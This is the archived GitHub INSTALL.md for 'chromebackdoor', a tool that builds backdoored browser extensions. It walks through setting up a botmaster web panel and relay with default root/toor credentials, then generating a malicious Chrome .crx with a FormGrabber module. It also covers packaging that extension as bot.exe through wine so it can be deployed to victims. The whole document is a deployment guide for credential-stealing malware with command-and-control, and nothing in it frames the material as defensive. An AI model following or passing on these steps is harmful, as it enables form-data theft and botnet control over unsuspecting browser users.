Skip to content
This repository has been archived by the owner on Apr 21, 2023. It is now read-only.

Latest commit

 

History

History
82 lines (61 loc) · 1.48 KB

INSTALL.md

File metadata and controls

82 lines (61 loc) · 1.48 KB

#INSTALL WEB

  1. unzip file generated by chromebackdoor
unzip folder.zip
  1. Upload a folder web & relais on hosting

  2. create database & user and update config file

/web/includes/config.php
  1. Upload .SQL on database
/SQL/chromebackdoor.sql
  1. Login on webpanel (web/index.php)
username = root
password = toor

#GENERATE BOT (without .EXE)

install all dependency & start chromebackdoor.py

python chromebackdoor.py

You can generate backdoor for all most popular browser

exemple for Google Chrome:

python chromebackdoor.py --chrome

Now enter a botmaster domain name (need SSL):

[?] Website hosted (https://localhost/)? https://lynxframework.com/

Same for relais (need SSL):

[?] Website relais url (https://localhost/relais)? https://lynxrelay.com/relais
or use same domain
[?] Website relais url (https://localhost/relais)? https://lynxframework.com/relais
[?] Information correct [Y/n]? Y

Select one module (exemple FormGrabber V1.0)

[?] please select numbers ? 2

The script generate zip file with .crx .perm and backdoor folder for update icon / name / desc

#BUILD .EXE

  1. run chrommebackdoor with --build
python chromebackdoor.py --build
  1. select browser backdoor (exemple --chrome)
[?] crx fime (/root/..) ? /root/backdoor.crx
  1. wine start installer.exe and generate bot.exe
Generate successful : {chromebackdoor_folder}/bot.exe
  1. Start bot.exe with windows